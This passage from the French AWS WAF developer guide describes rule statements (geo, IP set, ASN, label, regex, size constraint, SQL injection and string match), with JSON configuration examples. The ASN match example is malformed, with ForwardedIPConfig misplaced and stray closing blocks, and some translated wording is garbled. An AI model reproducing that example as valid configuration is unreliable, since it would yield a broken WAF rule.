+ **Codes de pays** : ensemble de codes de pays à comparer pour une correspondance géographique. Il doit s'agir de codes de pays à deux caractères issus des codes ISO de pays alpha-2 de la norme internationale ISO 3166, par exemple. `["US","CN"]` 
+ **(Facultatif) Configuration IP transférée** — Par défaut, AWS WAF utilise l'adresse IP dans l'origine de la requête Web pour déterminer le pays d'origine. Vous pouvez également configurer la règle pour utiliser une adresse IP transférée dans un en-tête HTTP à la `X-Forwarded-For` place. AWS WAF utilise la première adresse IP de l'en-tête. Avec cette configuration, vous spécifiez également un comportement de secours à appliquer à une requête Web dont l'en-tête contient une adresse IP mal formée. Le comportement de remplacement définit le résultat correspondant à la demande, qu'il corresponde ou non. Pour de plus amples informations, veuillez consulter [Utilisation d'adresses IP transférées](waf-rule-statement-forwarded-ip-address.md). 

## Où trouver cette déclaration de règle
<a name="geo-match-statement-where-to-find"></a>
+ **Générateur de règles** sur la console : pour l'**option Demande**, choisissez **Provient d'un pays de**.
+ **API** — [GeoMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_GeoMatchStatement.html)

## Exemples
<a name="waf-rule-statement-geo-examples"></a>

Vous pouvez utiliser le relevé de correspondance géographique pour gérer les demandes provenant de pays ou de régions spécifiques. Par exemple, si vous souhaitez bloquer les demandes provenant de certains pays, tout en autorisant les demandes provenant d'un ensemble spécifique d'adresses IP dans ces pays, vous pouvez créer une règle avec l'action définie sur Block et les instructions imbriquées suivantes, affichées en pseudocode :
+ AND déclaration
  + Instruction de correspondance géographique répertoriant les pays que vous souhaitez bloquer
  + NOT déclaration 
    + Instruction de jeu d'adresses IP qui spécifie les adresses IP via lesquelles vous souhaitez autoriser

Ou, si vous souhaitez bloquer certaines régions dans certains pays, tout en autorisant les demandes provenant d'autres régions de ces pays, vous pouvez d'abord définir une règle de correspondance géographique avec l'action définie sur. Count Définissez ensuite une règle de correspondance d'étiquettes qui correspond aux étiquettes de correspondance géographique ajoutées et gère les demandes selon vos besoins. 

Le pseudo-code suivant décrit un exemple de cette approche :

1. Déclaration de correspondance géographique répertoriant les pays dont les régions que vous souhaitez bloquer, mais dont l'action est définie sur Compter. Cela étiquette chaque requête Web, quel que soit le statut de correspondance, et vous donne également des mesures de comptage pour les pays qui vous intéressent. 

1. `AND`déclaration avec action de blocage
   + Déclaration de correspondance des libellés qui spécifie les libellés des pays que vous souhaitez bloquer
   + `NOT` déclaration 
     + Déclaration de correspondance des étiquettes qui spécifie les libellés des régions des pays que vous souhaitez autoriser

La liste JSON suivante montre une implémentation des deux règles décrites dans le pseudocode précédent. Ces règles bloquent tout le trafic en provenance des États-Unis d'Amérique, à l'exception du trafic en provenance de l'Oregon et de Washington. La déclaration Geo Match ajoute des libellés de pays et de régions à toutes les demandes qu'elle inspecte. La règle de correspondance des libellés s'exécute après la règle de correspondance géographique, de sorte qu'elle peut correspondre aux étiquettes de pays et de régions que la règle de correspondance géographique vient d'ajouter. L'instruction Geo Match utilise une adresse IP transférée, de sorte que la correspondance d'étiquettes spécifie également les étiquettes IP transférées. 

```
{
   "Name": "geoMatchForLabels",
   "Priority": 10,
   "Statement": {
     "GeoMatchStatement": {
       "CountryCodes": [
         "US"
       ],
       "ForwardedIPConfig": {
           "HeaderName": "X-Forwarded-For",
           "FallbackBehavior": "MATCH"
       }
     }
   },
   "Action": {
     "Count": {}
   },
   "VisibilityConfig": {
     "SampledRequestsEnabled": true,
     "CloudWatchMetricsEnabled": true,
     "MetricName": "geoMatchForLabels"
   }
},
{
   "Name": "blockUSButNotOROrWA",
   "Priority": 11,
   "Statement": {
     "AndStatement": {
       "Statements": [
         {
           "LabelMatchStatement": {
             "Scope": "LABEL",
             "Key": "awswaf:forwardedip:geo:country:US"
           }
         },
         {
           "NotStatement": {
             "Statement": {
                "OrStatement": {
                  "Statements": [
                    {
                       "LabelMatchStatement": {
                         "Scope": "LABEL",
                         "Key": "awswaf:forwardedip:geo:region:US-OR"
                       }
                    },
                    {
                       "LabelMatchStatement": {
                         "Scope": "LABEL",
                         "Key": "awswaf:forwardedip:geo:region:US-WA"
                       }
                    }
                 ]
               }
             }
           }
         }
       ]
     }
   },
   "Action": {
     "Block": {}
   },
   "VisibilityConfig": {
     "SampledRequestsEnabled": true,
     "CloudWatchMetricsEnabled": true,
     "MetricName": "blockUSButNotOROrWA"
   }
}
```

Autre exemple, vous pouvez associer la géolocalisation à des règles basées sur les taux pour hiérarchiser les ressources destinées aux utilisateurs d'un pays ou d'une région en particulier. Vous créez un relevé tarifaire différent pour chaque relevé de correspondance géographique ou de correspondance d'étiquette que vous utilisez pour différencier vos utilisateurs. Définissez une limite de débit supérieure pour les utilisateurs du pays ou de la région de votre choix et définissez une limite de débit inférieure pour les autres utilisateurs. 

La liste JSON suivante montre une règle de correspondance géographique suivie de règles basées sur le taux qui limitent le débit du trafic en provenance des États-Unis d'Amérique. Les règles permettent au trafic en provenance de l'Oregon d'entrer à un rythme plus élevé que le trafic en provenance de n'importe quel autre endroit du pays. 

```
{
  "Name": "geoMatchForLabels",
  "Priority": 190,
  "Statement": {
    "GeoMatchStatement": {
      "CountryCodes": [
        "US"
      ]
    }
  },
  "Action": {
    "Count": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "geoMatchForLabels"
  }
},
{
  "Name": "rateLimitOregon",
  "Priority": 195,
  "Statement": {
    "RateBasedStatement": {
      "Limit": 3000,
      "AggregateKeyType": "IP",
      "ScopeDownStatement": {
        "LabelMatchStatement": {
          "Scope": "LABEL",
          "Key": "awswaf:clientip:geo:region:US-OR"
        }
      }
    }
  },
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "rateLimitOregon"
  }
},
{
  "Name": "rateLimitUSNotOR",
  "Priority": 200,
  "Statement": {
    "RateBasedStatement": {
      "Limit": 100,
      "AggregateKeyType": "IP",
      "ScopeDownStatement": {
        "AndStatement": {
          "Statements": [
            {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:clientip:geo:country:US"
              }
            },
            {
              "NotStatement": {
                "Statement": {
                  "LabelMatchStatement": {
                    "Scope": "LABEL",
                    "Key": "awswaf:clientip:geo:region:US-OR"
                  }
                }
              }
            }
          ]
        }
      }
    }
  },
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "rateLimitUSNotOR"
  }
}
```

# Instruction de correspondance d'ensemble d'adresses IP de règle
<a name="waf-rule-statement-type-ipset-match"></a>

Cette section explique ce qu'est une instruction IP set match et comment elle fonctionne.

L'instruction IP set match inspecte l'adresse IP d'une requête Web par rapport à un ensemble d'adresses IP et de plages d'adresses. Utilisez cette option pour autoriser ou bloquer les demandes web basées sur les adresses IP d'origine des demandes. Par défaut, AWS WAF utilise l'adresse IP de l'origine de la requête Web, mais vous pouvez configurer la règle pour utiliser un en-tête HTTP à la `X-Forwarded-For` place. 



AWS WAF prend en charge toutes IPv4 les plages IPv6 CIDR à l'exception de`/0`. Pour plus d'informations sur la notation CIDR, consultez l'article [Classless Inter-Domain Routing](https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) sur Wikipédia (en anglais). Un jeu d'adresses IP peut contenir jusqu'à 10 000 adresses IP ou plages d'adresses IP à vérifier.

**Note**  
Chaque règle de correspondance de jeu d'adresses IP fait référence à un jeu d'adresses IP que vous créez et conservez indépendamment de vos règles. Vous pouvez utiliser un seul ensemble d'adresses IP dans plusieurs règles, et lorsque vous mettez à jour l'ensemble référencé, toutes les règles qui y font référence AWS WAF sont automatiquement mises à jour.   
Pour plus d'informations sur la création et la gestion d'un ensemble d'adresses IP, consultez[Création et gestion d'une adresse IP définie dans AWS WAF](waf-ip-set-managing.md).

Lorsque vous ajoutez ou mettez à jour les règles dans votre groupe de règles ou votre pack de protection (ACL Web), choisissez l'option **IP set** et sélectionnez le nom de l'ensemble d'adresses IP que vous souhaitez utiliser. 

## Caractéristiques de l'énoncé des règles
<a name="ipset-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 1 WCU pour la plupart. Si vous configurez l'instruction pour utiliser les adresses IP transférées et que vous spécifiez une position deANY, augmentez l'utilisation de la WCU de 4.

Cette instruction utilise les paramètres suivants : 
+ **Spécification de l'ensemble** d'adresses IP — Choisissez l'ensemble d'adresses IP que vous souhaitez utiliser dans la liste ou créez-en un nouveau. 
+ **(Facultatif) Configuration IP transférée** : nom d'en-tête IP transféré alternatif à utiliser à la place de l'origine de la demande. Vous spécifiez si la correspondance doit être faite avec la première, la dernière ou avec n'importe quelle adresse de l'en-tête. Vous spécifiez également un comportement de secours à appliquer à une requête Web dont l'adresse IP est mal formée dans l'en-tête spécifié. Le comportement de remplacement définit le résultat correspondant à la demande, qu'il corresponde ou non. Pour de plus amples informations, veuillez consulter [Utilisation d'adresses IP transférées](waf-rule-statement-forwarded-ip-address.md). 

## Où trouver cette déclaration de règle
<a name="ipset-match-where-to-find"></a>

**Où trouver cette déclaration de règle**
+ **Générateur de règles** sur la console : pour l'**option Requête**, choisissez **Provient d'une adresse IP dans**.
+ **Ajouter mes propres règles et groupes** de règles sur la console — Choisissez l'option **IP set**.
+ **API** — [IPSetReferenceStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_IPSetReferenceStatement.html)

# Déclaration de règle de correspondance ASN (Autonomous System Number)
<a name="waf-rule-statement-type-asn-match"></a>

Une déclaration de règle de correspondance ASN vous AWS WAF permet d'inspecter le trafic Web en fonction du numéro de système autonome (ASN) associé à l'adresse IP de la demande. ASNs sont des identifiants uniques attribués à de grands réseaux Internet gérés par des organisations telles que des fournisseurs de services Internet, des entreprises, des universités ou des agences gouvernementales. En utilisant les instructions de correspondance ASN, vous pouvez autoriser ou bloquer le trafic provenant d'organisations de réseau spécifiques sans avoir à gérer des adresses IP individuelles. Cette approche offre un moyen plus stable et plus efficace de contrôler l'accès par rapport aux règles basées sur l'IP, car elles ASNs changent moins fréquemment que les plages d'adresses IP. 

La correspondance ASN est particulièrement utile pour les scénarios tels que le blocage du trafic en provenance de réseaux problématiques connus ou l'autorisation d'accès uniquement à partir de réseaux partenaires fiables. L'instruction ASN match permet de déterminer avec flexibilité l'adresse IP du client grâce à une configuration IP transférée optionnelle, ce qui la rend compatible avec diverses configurations réseau, y compris celles utilisant des réseaux de diffusion de contenu (CDNs) ou des proxys inverses.

**Note**  
La correspondance ASN complète, mais ne remplace pas, les contrôles d'authentification et d'autorisation standard. Nous vous recommandons de mettre en œuvre des mécanismes d'authentification et d'autorisation, tels que l'IAM, pour vérifier l'identité de toutes les demandes dans vos applications.

## Comment fonctionne le relevé de match de l'ASN
<a name="waf-rule-statement-type-asn-match-how-it-works"></a>

AWS WAF détermine l'ASN d'une demande en fonction de son adresse IP. Par défaut, AWS WAF utilise l'adresse IP d'origine de la requête Web. Vous pouvez configurer AWS WAF pour utiliser une adresse IP provenant d'un autre en-tête de demande`X-Forwarded-For`, par exemple en activant la configuration IP transférée dans les paramètres de l'énoncé de règle.

L'instruction ASN match compare l'ASN de la demande à la liste ASNs spécifiée dans la règle. Si l'ASN correspond à l'un des numéros de la liste, l'instruction est considérée comme vraie et l'action de règle associée est appliquée.

### Gestion des données non mappées ASNs
<a name="waf-rule-statement-type-asn-match-unmapped"></a>

S'il AWS WAF n'est pas possible de déterminer un ASN pour une adresse IP valide, il attribue un ASN 0. Vous pouvez inclure l'ASN 0 dans votre règle pour traiter ces cas de manière explicite.

### Comportement de secours en cas d'adresses IP non valides
<a name="waf-rule-statement-type-asn-match-fallback"></a>

Lorsque vous configurez l'instruction ASN match pour utiliser des adresses IP transférées, vous pouvez définir un comportement de secours *Match ou *No match** pour les demandes dont les adresses IP sont invalides ou manquantes dans l'en-tête désigné.

## Caractéristiques de l'énoncé des règles
<a name="waf-rule-statement-type-asn-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 1 ECU

Cette instruction utilise les paramètres suivants :
+ **Liste ASN** : tableau de numéros ASN à comparer pour une correspondance ASN. Les valeurs valides sont comprises entre 0 et 4294967295. Vous pouvez spécifier jusqu'à 100 ASNs pour chaque règle.
+ **(Facultatif) Configuration IP transférée** — Par défaut, AWS WAF utilise l'adresse IP dans l'origine de la demande Web pour déterminer l'ASN. Vous pouvez également configurer la règle pour utiliser une adresse IP transférée dans un en-tête HTTP à la `X-Forwarded-For` place. Vous spécifiez si vous souhaitez utiliser la première, la dernière ou n'importe quelle adresse dans l'en-tête. Avec cette configuration, vous spécifiez également un comportement de secours à appliquer à une requête Web dont l'en-tête contient une adresse IP mal formée. Le comportement de remplacement définit le résultat correspondant à la demande, qu'il corresponde ou non. Pour plus d'informations, consultez la section [Utilisation d'adresses IP transférées](https://docs.aws.amazon.com/waf/latest/developerguide/waf-rule-statement-forwarded-ip-address.html).

## Où trouver cette déclaration de règle
<a name="waf-rule-statement-type-asn-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour l'**option Demande**, choisissez **Provient de l'ASN dans.**
+ **API** — [AsnMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_AsnMatchStatement.html)

## Exemples
<a name="waf-rule-statement-type-asn-match-examples"></a>

Cet exemple bloque les demandes provenant de deux requêtes spécifiques ASNs dérivées d'un `X-Forwarded-For` en-tête. Si l'adresse IP dans l'en-tête est mal formée, le comportement de secours configuré est le suivant. `NO_MATCH`

```
{
  "Action": {
    "Block": {}
  },
  "Name": "AsnMatchStatementRule",
  "Priority": 1,
  "Statement": {
    "AsnMatchStatement": {
      "AsnList": [64496, 64500]
    },
    "ForwardedIPConfig": {
      "FallbackBehavior": "NO_MATCH",
      "HeaderName": "X-Forwarded-For"
    }
  },
  "VisibilityConfig": {
    "CloudWatchMetricsEnabled": true,
    "MetricName": "AsnMatchRuleMetrics",
    "SampledRequestsEnabled": true
  }
},
"VisibilityConfig": {
  "CloudWatchMetricsEnabled": true,
  "MetricName": "WebAclMetrics",
  "SampledRequestsEnabled": true
}
}
```

# Déclaration relative à la règle de correspondance des étiquettes
<a name="waf-rule-statement-type-label-match"></a>

Cette section explique ce qu'est une déclaration de correspondance d'étiquettes et comment elle fonctionne.

L'instruction label match inspecte les étiquettes figurant sur la requête Web par rapport à une spécification de chaîne. Les étiquettes disponibles pour une règle à des fins d'inspection sont celles qui ont déjà été ajoutées à la requête Web par d'autres règles dans le cadre de la même évaluation du pack de protection (ACL Web). 

Les étiquettes ne sont pas conservées en dehors de l'évaluation du pack de protection (ACL Web), mais vous pouvez accéder aux métriques des étiquettes CloudWatch et vous pouvez consulter des résumés des informations relatives aux étiquettes pour n'importe quel pack de protection (ACL Web) dans la AWS WAF console. Pour plus d’informations, consultez [Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label) et [Surveillance et réglage de vos AWS WAF protections](web-acl-testing-activities.md). Vous pouvez également voir les étiquettes dans les journaux. Pour plus d'informations, consultez [Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).

**Note**  
Une instruction de correspondance d'étiquettes ne peut voir que les libellés issus de règles évaluées précédemment dans le pack de protection (ACL Web). Pour plus d'informations sur le AWS WAF mode d'évaluation des règles et des groupes de règles dans un pack de protection (ACL Web), consultez[Définition de la priorité des règles](web-acl-processing-order.md).

Pour plus d'informations sur l'ajout et la mise en correspondance d'étiquettes, consultez[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

## Caractéristiques de l'énoncé des règles
<a name="label-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 1 ECU

Cette instruction utilise les paramètres suivants : 
+ **Champ de correspondance** : définissez ce paramètre **sur Label** pour qu'il corresponde au nom de l'étiquette et, éventuellement, aux espaces de noms et au préfixe précédents. Définissez ce paramètre sur **Namespace** pour qu'il corresponde à certaines ou à toutes les spécifications de l'espace de noms et, éventuellement, au préfixe précédent. 
+ **Clé** — La chaîne à laquelle vous souhaitez faire correspondre. Si vous spécifiez une étendue de correspondance d'espaces de noms, celle-ci ne doit spécifier que les espaces de noms et éventuellement le préfixe, avec deux points à la fin. Si vous spécifiez une étendue de correspondance d'étiquettes, celle-ci doit inclure le nom de l'étiquette et peut éventuellement inclure les espaces de noms et le préfixe précédents. 

Pour plus d'informations sur ces paramètres, consultez [AWS WAF règles qui correspondent aux libellés](waf-rule-label-match.md) et [AWS WAF exemples de correspondance d'étiquettes](waf-rule-label-match-examples.md).

## Où trouver cette déclaration de règle
<a name="label-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour l'**option Demande**, choisissez **Has label**.
+ **API** — [LabelMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_LabelMatchStatement.html)

# Déclaration de règle de correspondance Regex
<a name="waf-rule-statement-type-regex-match"></a>

Cette section explique ce qu'est une instruction regex match et comment elle fonctionne.

Une instruction regex match indique de AWS WAF faire correspondre un composant de requête à une seule expression régulière (regex). Une requête Web correspond à l'instruction si le composant de demande correspond à l'expression régulière que vous spécifiez. 

Ce type d'instruction constitue une bonne alternative [Instruction de correspondance d'ensemble de modèles d'expression régulière de règle](waf-rule-statement-type-regex-pattern-set-match.md) aux situations dans lesquelles vous souhaitez combiner vos critères de correspondance en utilisant la logique mathématique. Par exemple, si vous souhaitez qu'un composant de requête corresponde à certains modèles de regex et non à d'autres, vous pouvez combiner les instructions regex match en utilisant le [ANDdéclaration de règle](waf-rule-statement-type-and.md) et le. [NOTdéclaration de règle](waf-rule-statement-type-not.md) 

AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

## Caractéristiques de l'énoncé des règles
<a name="regex-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 3 WCUs, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

## Où trouver cette déclaration de règle
<a name="regex-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour le **type Match**, choisissez **Correspond à une expression régulière**.
+ **API** — [RegexMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_RegexMatchStatement.html)

# Instruction de correspondance d'ensemble de modèles d'expression régulière de règle
<a name="waf-rule-statement-type-regex-pattern-set-match"></a>

Cette section explique ce qu'est une instruction regex pattern set match et comment elle fonctionne.

La correspondance de l'ensemble de modèles regex inspecte la partie de la demande web que vous spécifiez et recherche les modèles d'expression régulière que vous avez définis dans un ensemble de modèles regex.

AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

**Note**  
Chaque règle de correspondance d'ensemble de modèles regex fait référence à un ensemble de modèlesregex, que vous créez et maintenez indépendamment de vos règles. Vous pouvez utiliser un seul ensemble de modèles regex dans plusieurs règles, et lorsque vous mettez à jour l'ensemble référencé, toutes les règles qui y font référence AWS WAF sont automatiquement mises à jour.   
Pour de plus amples informations sur la création et la gestion d'un ensemble de modèles regex, reportez-vous à la section [Création et gestion d'un modèle regex défini dans AWS WAF](waf-regex-pattern-set-managing.md).

Une instruction regex pattern set match indique de AWS WAF rechercher l'un des modèles de l'ensemble dans le composant de requête que vous choisissez. Une demande web correspond à l'instruction de règle de l'ensemble de modèles si le composant de demande correspond à l'un des modèles de l'ensemble. 

Si vous souhaitez combiner vos correspondances de modèles regex en utilisant la logique, par exemple pour les faire correspondre à certaines expressions régulières et non à d'autres, pensez à utiliser[Déclaration de règle de correspondance Regex](waf-rule-statement-type-regex-match.md). 

## Caractéristiques de l'énoncé des règles
<a name="regex-pattern-set-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 25 WCUs, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

Cette instruction nécessite les paramètres suivants : 
+ Spécification du jeu de modèles Regex — Choisissez le jeu de modèles Regex que vous souhaitez utiliser dans la liste ou créez-en un nouveau. 

## Où trouver cette déclaration de règle
<a name="regex-pattern-set-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Type de correspondance**, choisissez **Condition de correspondance de chaîne** > **Correspond au modèle du jeu d'expressions régulières**.
+ **API** — [RegexPatternSetReferenceStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_RegexPatternSetReferenceStatement.html)

# Instruction de contrainte de taille de règle
<a name="waf-rule-statement-type-size-constraint-match"></a>

Cette section explique ce qu'est une instruction de contrainte de taille et comment elle fonctionne.

Une instruction de contrainte de taille compare le nombre d'octets AWS WAF reçus pour un composant de requête Web à un nombre que vous fournissez, et le correspond en fonction de vos critères de comparaison. 

Le critère de comparaison est un opérateur tel que supérieur à (>) ou inférieur à (<). Par exemple, vous pouvez établir une correspondance sur des demandes dont la taille de la chaîne de requête est supérieure à 100 octets. 

Si vous inspectez le chemin de l'URI, tout `/` élément du chemin compte pour un caractère. Par exemple, le chemin `/logo.jpg` de l'URI comporte neuf caractères.

**Note**  
Cette instruction inspecte uniquement la taille du composant de requête Web. Il n'inspecte pas le contenu du composant. 

## Caractéristiques de l'énoncé des règles
<a name="size-constraint-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 1 WCU, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête. Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).

  Une instruction de contrainte de taille inspecte uniquement la taille du composant une fois les transformations appliquées. Il n'inspecte pas le contenu du composant. 
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant d'inspecter sa taille. Par exemple, vous pouvez compresser des espaces blancs ou décoder des entités HTML. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

En outre, cette instruction nécessite les paramètres suivants : 
+ **Condition de correspondance de taille** : indique l'opérateur de comparaison numérique à utiliser pour comparer la taille que vous fournissez avec le composant de demande que vous avez choisi. Choisissez l'opérateur dans la liste.
+ **Taille** : paramètre de taille, en octets, à utiliser dans la comparaison. 

## Où trouver cette déclaration de règle
<a name="size-constraint-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Type de correspondance**, sous **Condition de correspondance de taille**, choisissez la condition que vous souhaitez utiliser.
+ **API** — [SizeConstraintStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_SizeConstraintStatement.html)

# Instruction d'attaque par injection SQL de règle
<a name="waf-rule-statement-type-sqli-match"></a>

Cette section explique ce qu'est une instruction de règle d'injection SQL et comment elle fonctionne.

Une instruction de règle d'injection SQL permet de détecter la présence de code SQL malveillant. Les attaquants insèrent du code SQL malveillant dans les requêtes Web afin de modifier votre base de données ou d'en extraire des données.

## Caractéristiques de l'énoncé des règles
<a name="sqli-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— Le coût de base dépend du niveau de sensibilité défini pour l'énoncé de règle : Low coûts 20 et High coûts 30. 

Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

En outre, cette instruction nécessite le réglage suivant : 
+ **Niveau de sensibilité** : ce paramètre ajuste la sensibilité des critères de correspondance par injection SQL. Les options sont LOW et HIGH. Le paramètre par défaut est LOW. 

  Le HIGH paramètre détecte un plus grand nombre d'attaques par injection SQL et est le paramètre recommandé. En raison de la sensibilité accrue, ce paramètre génère davantage de faux positifs, en particulier si vos requêtes Web contiennent généralement des chaînes inhabituelles. Au cours du test et du réglage de votre pack de protection (ACL Web), vous devrez peut-être redoubler d'efforts pour limiter les faux positifs. Pour plus d'informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md). 

  La valeur la plus faible permet une détection des injections SQL moins rigoureuse, ce qui réduit également le nombre de faux positifs. LOWpeut être un meilleur choix pour les ressources dotées d'autres protections contre les attaques par injection de code SQL ou présentant une faible tolérance aux faux positifs. 

## Où trouver cette déclaration de règle
<a name="sqli-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Type de match**, choisissez **Attack match condition** > **Contient des attaques par injection SQL**.
+ **API** — [SqliMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_SqliMatchStatement.html)

# Instruction de correspondance de chaîne de règle
<a name="waf-rule-statement-type-string-match"></a>

Cette section explique ce qu'est une instruction de correspondance de chaîne et comment elle fonctionne.

Une instruction de correspondance de chaîne indique la chaîne que vous AWS WAF souhaitez rechercher dans une demande, son emplacement dans la demande et le mode de recherche. Par exemple, vous pouvez rechercher une chaîne spécifique au début de n'importe quelle chaîne de requête de la demande ou comme correspondance exacte pour l'en-tête `User-agent` de la demande. Généralement, la chaîne est composée de caractères ASCII affichables, mais vous pouvez spécifier n'importe quel caractère de valeur hexadécimale 0x00 à 0xFF (valeur décimale 0 à 255). 

## Caractéristiques de l'énoncé des règles
<a name="string-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— Le coût de base dépend du type d'allumette que vous utilisez.
+ **Correspond exactement à la chaîne** — 2 
+ **Commence par une chaîne** — 2 
+ **Se termine par une ficelle** — 2 
+ **Contient une chaîne** — 10 
+ **Contient le mot** — 10 

